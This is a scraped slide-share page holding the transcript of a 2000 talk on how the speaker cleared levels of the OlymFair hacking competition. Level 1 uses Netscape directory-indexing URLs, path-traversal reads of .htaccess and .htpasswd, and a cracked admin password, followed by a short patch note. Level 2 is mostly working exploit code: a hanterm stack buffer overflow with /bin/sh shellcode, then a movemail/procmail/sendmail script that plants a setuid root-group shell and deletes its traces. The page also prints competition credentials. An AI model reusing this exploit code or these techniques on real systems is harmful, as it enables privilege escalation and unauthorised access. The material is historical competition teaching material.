1 / 40

1 st OlymFair Workshop Hacking technique

1 st OlymFair Workshop Hacking technique. Taeho Oh ohhara@4dl.com ohhara@postech.edu http://postech.edu/~ohhara. Contents. How to pass level 1 How to pass level 2 Why did many hackers consume much time in the level 2? About level 3 Conclusion. How to pass level 1 (1). What to do?

clint
Download Presentation

1 st OlymFair Workshop Hacking technique

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. 1st OlymFair WorkshopHacking technique Taeho Oh ohhara@4dl.com ohhara@postech.edu http://postech.edu/~ohhara

  2. Contents • How to pass level 1 • How to pass level 2 • Why did many hackers consume much time in the level 2? • About level 3 • Conclusion

  3. How to pass level 1 (1) • What to do? • Execute /cgi-bin/data/idaccess.cgi and get the way to go to level 2

  4. How to pass level 1 (2) • Level 1 servers • 203.227.243.161 • 203.227.243.162 • 203.227.243.163

  5. How to pass level 1 (3) • 203.227.243.161 • OS : Solaris 8 • Opened TCP port : 80, 8080

  6. How to pass level 1 (4) • 203.227.243.162 • OS : HPUX 11.0 • Opened TCP port : 22, 80, 8080

  7. How to pass level 1 (5) • 203.227.243.163 • OS : MS Windows 2000 • Opened TCP port : 7, 9, 13, 17, 19, 25, 80, 135, 139, 443, 1025, 1026, 1032, 1723, 3389

  8. How to pass level 1 (6) • Attack 203.227.243.161 • 80 : Apache Web Server • 8080 : Netscape Enterprise Server • 80 and 8080 web server has same httpd home directory • Netscape Enterprise Server has a security bug

  9. How to pass level 1 (7) • Netscape Enterprise Server security bug • I could see files in the specific directory like below • http://203.227.243.161/?wp-cs-dump • You can also use ?wp-ver-info, ?wp-html-rend, ?wp-usr-prop, ?wp-ver-diff, ?wp-verify-link, ?wp-start-ver, ?wp-stop-ver, and ?wp-uncheckout • I could browse the directories and check the file existence

  10. How to pass level 1 (8) • The file list Can’t access this directory / +----- cgi-bin/ | +----- data/ | +----- hackme/ | +----- a | +----- a.c | +----- show_file.html | +----- showfile.cgi +----- data/ +----- index.html

  11. How to pass level 1 (9) • Read .htaccess file with showfile.cgi • http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi-bin/data/.htaccess • Read .htpasswd file from .htaccess with showfile.cgi • http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi-bin/data/.htpasswd

  12. How to pass level 1 (10) • I could crack the encrypted password from .htpasswd with Crack • id:password = admin:banana • I could access /cgi-bin/data directory with this id and password

  13. How to pass level 1 (11) • I could get the way to go to level 2 • http://203.227.243.161/data/idaccess.html • This page is the form that executes http://203.227.243.161/cgi-bin/data/idaccess.cgi • My serial number • KOR000321-961829513 • My password • oD8YEuqYySWogKSQQsOY00zoAjUkxtv7

  14. How to pass level 1 (12) • Netscape Enterprise Server directory indexing vulnerability • See http://www.securityfocus.com/vdb/bottom.html?vid=1063

  15. How to pass level 1 (13) • Netscape Enterprise Server directory indexing vulnerability patch information The Directory Indexing feature can be turned off via the Administration Interface. Selecting Content Management -> Document Preferences and changing Directory Indexing to "none" will disable this feature.Also, manually editing the file obj.conf will do the same. Conduct a search for the following:Service method="(GET|HEAD)" type="magnus-internal/directory"fn="index-common"and replace fn="index-common" with fn="send-error".

  16. How to pass level 2 (1) • What to do? • Execute /home/forbidden/pass.cgi • This executable file owner is root • This executable file group is wizard • The permission is 0510 • Need wizard gid to execute /home/forbidden/pass.cgi

  17. How to pass level 2 (2) • Level 2 server • 203.227.243.164 • 203.227.243.164 • OS : Linux • Opened TCP port : 23, 81

  18. How to pass level 2 (3) • Wizard setuid or setgid files -r-sr-xr-x 1 wizard wizard 26309 Jan 4 09:40 /sbin/pwdb_chkpwd -rwsr-sr-x 1 wizard wizard 47692 Mar 29 1999 /sbin/dump -rwsr-xr-x 1 wizard wizard 10708 Apr 20 1999 /sbin/cardctl -rws--x--x 1 wizard wizard 6148 May 15 1999 /usr/X11R6/bin/Xwrapper -rws--x--x 1 wizard wizard 158180 May 14 1999 /usr/X11R6/bin/hanterm -rwsr-xr-x 1 wizard wizard 33120 Mar 22 1999 /usr/bin/at -rwsr-xr-x 1 wizard wizard 3208 Mar 23 1999 /usr/bin/disable-paste -r-sr-x--- 1 wizard wizard 42652 Aug 31 1999 /usr/bin/inndstart -r-sr-x--- 1 wizard wizard 40060 Aug 31 1999 /usr/bin/startinnfeed -r-sr-sr-x 1 wizard wizard 15816 Jan 7 07:41 /usr/bin/lpq -r-sr-sr-x 1 wizard wizard 15608 Jan 7 07:41 /usr/bin/lpr -r-sr-sr-x 1 wizard wizard 16248 Jan 7 07:41 /usr/bin/lprm

  19. How to pass level 2 (4) • Wizard setuid or setgid files ( Cont. ) -rws--x--x 2 wizard wizard 517916 Apr 7 1999 /usr/bin/suidperl -rws--x--x 2 wizard wizard 517916 Apr 7 1999 /usr/bin/sperl5.00503 -rwsr-sr-x 1 wizard wizard 64468 Apr 7 1999 /usr/bin/procmail -rwsr-xr-x 1 wizard wizard 14036 Apr 16 1999 /usr/bin/rcp -rwsr-xr-x 1 wizard wizard 10516 Apr 16 1999 /usr/bin/rlogin -rwsr-xr-x 1 wizard wizard 7780 Apr 16 1999 /usr/bin/rsh -rwxr-sr-x 1 wizard wizard 17832 May 14 1999 /usr/lib/emacs/20.3/i386-redhat-linux/movemail -rwsr-sr-x 1 wizard wizard 299364 Apr 20 1999 /usr/sbin/sendmail -rwsr-xr-x 1 wizard wizard 16488 Mar 23 1999 /usr/sbin/traceroute -rwsr-xr-x 1 wizard wizard 18040 Jan 8 05:24 /usr/sbin/userhelper -rwxr-sr-x 1 wizard wizard 3860 Apr 20 1999 /sbin/netreport

  20. How to pass level 2 (5) • Attack process Get level2 shell Create wizard uid, gid file Get wizard euid Get wizard gid Get wizard uid Execute pass.cgi

  21. How to pass level 2 (6) • level2 shell  wizard euid • Exploit hanterm bug [I have no name!@level2 ... ]$ hanterm -hfn `perl -e "print 'A'x240"` can't load english font AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAA [I have no name!@level2 ... ]$ hanterm -hfn `perl -e "print 'A'x250"` Segmentation fault [I have no name!@level2 ... ]$

  22. How to pass level 2 (7) • level2 shell  wizard euid (Cont.) • This is a classical buffer overflow bug • I could get wizard euid shell with 260 buffer size and -450 offset

  23. How to pass level 2 (8) • Exploit code #include<stdio.h> #include<stdlib.h> #define OFFSET -450 #define RET_POSITION 260 #define RANGE 20 #define NOP 0x90 char shellcode[1024]= "\xeb\x1f“ /* jmp 0x1f */ "\x5e“ /* popl %esi */ "\x89\x76\x08“ /* movl %esi,0x8(%esi) */

  24. How to pass level 2 (9) • Exploit code (Cont.) "\x31\xc0“ /* xorl %eax,%eax */ "\x88\x46\x07“ /* movb %eax,0x7(%esi) */ "\x89\x46\x0c“ /* movl %eax,0xc(%esi) */ "\xb0\x0b“ /* movb $0xb,%al */ "\x89\xf3“ /* movl %esi,%ebx */ "\x8d\x4e\x08“ /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c“ /* leal 0xc(%esi),%edx */ "\xcd\x80“ /* int $0x80 */ "\x31\xdb“ /* xorl %ebx,%ebx */ "\x89\xd8“ /* movl %ebx,%eax */

  25. How to pass level 2 (10) • Exploit code (Cont.) "\x40“ /* inc %eax */ "\xcd\x80“ /* int $0x80 */ "\xe8\xdc\xff\xff\xff“ /* call -0x24 */ "/bin/sh"; /* .string \"/bin/sh\" */ unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc,char **argv) {

  26. How to pass level 2 (11) • Exploit code (Cont.) char buff[RET_POSITION+RANGE+1],*ptr; long *addr_ptr,addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+1; int i; if(argc>1) offset=atoi(argv[1]); sp=get_sp(); addr=sp-offset; ptr=buff;

  27. How to pass level 2 (12) • Exploit code (Cont.) addr_ptr=(long*)ptr; for(i=0;i<bsize;i+=4) *(addr_ptr++)=addr; for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++) buff[i]=NOP; ptr=buff+bsize-RANGE*2-strlen(shellcode)-1; for(i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i]; buff[bsize-1]='\0';

  28. How to pass level 2 (13) • Exploit code (Cont.) execl("/usr/X11R6/bin/hanterm","hanterm",“-hfn",buff,0); }

  29. How to pass level 2 (14) • wizard euid  wizard uid [I have no name!@level2 ... ]$ cat > a.c main(){ setreuid(501,501); execl("/bin/sh","sh",0); } [I have no name!@level2 ... ]$ gcc a.c ; ./a.out [wizard@level2 ... ]$ whoami wizard [wizard@level2 ... ]$

  30. How to pass level 2 (15) • wizard uid  create wizard uid, gid file • movemail program is wizard setgid program • movemail program output file is wizard gid [wizard@level2 ... ]$ echo haha > test1 [wizard@level2 ... ]$ movemail test1 test2 [wizard@level2 ... ]$ ls –l test1 test2 -rw-r--r-- 1 wizard hackers 0 Jul 10 02:03 test1 -rw-r--r-- 1 wizard wizard 5 Jul 10 02:03 test2 [wizard@level2 ... ]$ cat test2 haha

  31. How to pass level 2 (16) • wizard uid, gid file  wizard gid • procmail can execute a arbitrary shell command with wizard uid, gid when the user can create wizard uid, gid file

  32. How to pass level 2 (17) • Exploit code #!/bin/sh PATH=${PATH}:/usr/lib/emacs/20.3/i386-redhat-linux export PATH cat > shh.c << EOF main(){ setreuid(501,501); setregid(501,501); execl("/bin/sh","sh",0); } EOF

  33. How to pass level 2 (18) • Exploit code (Cont.) gcc shh.c -o shh movemail shh shh2 cat > proc << EOF :0 * | /bin/chmod 6777 /tmp/shh2 EOF

  34. How to pass level 2 (19) • Exploit code (Cont.) movemail proc /home/wizard/.procmailrc echo haha | /usr/sbin/sendmail -OQueueDirectory=/tmp wizard sleep 2 rm -f /home/wizard/.procmailrc rm -f ./proc rm -f ./exp rm -f ./shh.c rm -f ./shh echo "rm -f ./shh2" | ./shh2

  35. How to pass level 2 (20) • wizard gid  execute pass.cgi Congratulation!! You have passed Level 2. Your ID : KOR000321-961829513 Initial Pass Time Stamp : 2000-06-30 13:59:30GMT+9 IP for Level 3 is 203.227.243.173 It is protected by ip filtering. Please attack and acquire adminstrator's privilege.And then change the index.htm l under level3 server. Level 3 Login ID : level3 Level 4 Login Passwd : olymfair3

  36. Why did many hackers consume much time in the level 2? (1) • Almost all hackers tried to find a security bug • However, level2 can be cleared with not a bug but a feature. ( except for hanterm bug )

  37. Why did many hackers consume much time in the level 2? (2) • /sbin/dump program has a buffer overflow bug and exploit is not released • Many hackers try to exploit this program. However, the exploit is impossible because main function does not return but exit

  38. Why did many hackers consume much time in the level 2? (3) • /usr/bin/lprm exploit code generates segmentation fault message • The segmentation fault message is not generated by /usr/bin/lprm. The message is generated by /usr/bin/lprm exploit code. It’s an exploit code bug.

  39. About level 3 • I consumed much time so I have no time to attack level 3 • I tried to scan level 3 server • However, I can’t find opened TCP port • I didn’t try to attack level 3 from then on • It seemed to take much time

  40. Conclusion • It was an interesting hacking competition

More Related